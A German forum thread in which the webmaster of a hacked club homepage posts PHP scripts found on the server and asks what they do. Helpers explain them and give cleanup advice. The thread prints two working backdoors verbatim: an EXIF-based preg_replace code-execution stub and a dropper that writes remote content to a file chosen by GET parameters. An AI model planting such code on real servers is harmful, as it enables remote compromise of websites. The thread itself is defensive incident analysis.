Virus mit PHP

solala123

solala123

Erfahrenes Mitglied
Hallo,
ich hatte vor nicht allzulanger Zeit geschrieben, dass meine Vereinshomepage gehackt worden ist.
Jetzt habe ich 3 PHP Skripte gefunden, die nicht von mir sind.
Würdet Ihr die Skripte mal ansehen und vielleicht kann mir jemand sagen, was die Skripte bewirken.


DIE SKRIPTE BITTE NICHT KOPIEREN; ES SIND VERMUTLICH SCHÄDLICHE SKRIPTE !

PHP: 
<?php
$exif = exif_read_data('/homepages/34/d10430086/htdocs/TSV-Roth.de/Bilder/Zeitungsberichte-ab-1981-Dia/album/slides/638..09.09.82.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
?>


Im ersten Skript ist irgend etwas mit einem Bild, aber was weiß ich nicht habe nichts besonderes daran gefunden.




PHP: 
<?php if (@$_GET['a']==5) {exit('17');}
if (!empty($_GET['z']) && !empty($_GET['id']))
{
if (!$handle = fopen($_GET['z'], 'a')) {exit;}
if (fwrite($handle, file_get_contents($_GET['id'])) === FALSE) {exit;}
fclose($handle);
exit('OK');
}
?>


Ich hatte immer wieder 2 Dateien in meinen Ordnern mit yx,php die immer wieder auftauchten, auch wenn ich sie gelöscht hatte. Das erste mal wurde die Homepage total zerstört.
Wieso die HP gehackt wurde, kam vermutlich von Jomala, die haben aber inzwischen ihr Loch gestopft.




Ich habe die PHP Skripte gelöscht und wieder auf den Server hochgeladen, dachte es sei jetzt vorbei.

FALSCH:
Habe gerade eben die Dateien kontrolliert und es waren wieder die PHP Skripte in den Ordnern und auch wieder neue PKP Skripte vorhanden mit den Bezeichnungen:
8ax.php Dateigröße: 23.333 Zeit: 30.10.2013 01:40 Uhr
j9s2.php Dateigröße: 23.333 Zeit: 30.10.2013 02:22 Uhr

Bin am Verzweifeln



mfg
Rainer
 
Zuletzt bearbeitet:
Das ist wohl "Hacken für Anfänger".

Der untere Code macht nichts anderes als einen Dateinamen (zB 'hack.php') und einen Link entgegenzunehmen (zB 'www.hacker.de/ichhabebösenhackinhalt.txt') und den Inhalt der Seite hinter dem Link in der angegebenen datei abzulegen. Der Hacker kann die generierte datei dann auf deinem Server durch einen simplen Aufruf ausführen ('www.deinserver.org/pfad/hack.php').

Im Fachjargon heißt das dann wohl reote file inclusion/execution.

Der obere Code sieht ersmal nicht schädlich aus, allerdings wurden die exif header des Bildes eventuell manipuliert. Kannst du das Bild mal irgendwie hochladen? (Meinetwegen auch base64 kodiert, falls du Angst hast schaden anzurichten)
 
Zuletzt bearbeitet:
Hallo,
wie soll ich das Bild hochladen ?
mache es mal mit Anhänge

Habe meinen ersten Beitrag nochmal ergänzt

Gruß
Rainer
 

Anhänge

  • 638..09.09.82.jpg
    638..09.09.82.jpg
    104,1 KB · Aufrufe: 26
  • Alle Passwörter ändern.
  • Logs durchsuchen.
  • PHP-Skripte nach Sicherheitslücken sichten.

Was das mit den EXIF-Daten soll, weiß ich auch nicht. Was für ein Motiv sollte der (H|Cr)acker dafür haben?
Die zweite Sicherheitslücke hat er wohl zuerst ausgenutzt oder eine ganz andere genutzt, denn sonst könnte er den Pfad des Bildes nicht wissen.
 
Hallo,
Passwörter haben wir schon geändert aber das hat nichts genützt.
Auf der HP http://www.tsv-roth.de
gibt es nichts zum "Eingeben" ist alles nur zum lesen.

An die Login Files komm ich nicht ran, weil ich die HP nur bearbeite bzw erstellt habe und ein Mannschaftskollege stellt den Serverplatz wohl bei 1&1 uns zur Verfügung.

habe alle Seiten der HP nochmals nach fremden Code durchsucht, es waren "nur die 3 php Skripte" die nach dem Löschen wieder neu an der gleichen Stelle auftauchen.

kann man am Bild etwas erkennen, das es manipuliert wurde?

Gruß
Rainer
 
Zuletzt bearbeitet:
gibt es nichts zum "Eingeben" ist alles nur zum lesen.
Zum Vergrößern anklicken....
Überall wo externe Daten verwertet werden, kann es eine Sicherheitslücke geben!
Auch GET-Parameter (z.B. welche Seite angezeigt werden soll)!

Übrigens, die Seite besitzt 67 Fehler und 392 Warnungen laut dem W3C Validator!
 
Dazu müsste man wissen, wie er genau eingedrungen ist und welche Sicherheitslücke er als erstes ausgenutzt hat.
Dazu wären Logs hilfreich (bei 1 & 1 erfragen).

Ansonsten könntest du auch alles nochmal neu aufsetzen (dein alter Code) + eine Funktion, die jeden Aufruf mit Parametern ($_SERVER, $_REQUEST, $_SESSION) loggt. Wenn der "Virus" wieder da ist, die Logs durchsuchen. Diese Methode ist aber sehr unsicher! Wer weiß, was der Typ als nächstes in die PHP-Datei schreibt?
 
Hallo,
habe vor 5 Tagen das Bild gelöscht und habe seitdem Ruhe
Hoffentlich bleibt es so, 5 Tage sind ja noch nicht viel.
Danke an Allen die Geantwortet haben
Gruß
Rainer
 
Um antworten zu können musst du eingeloggt sein.

Neue Beiträge

Zurück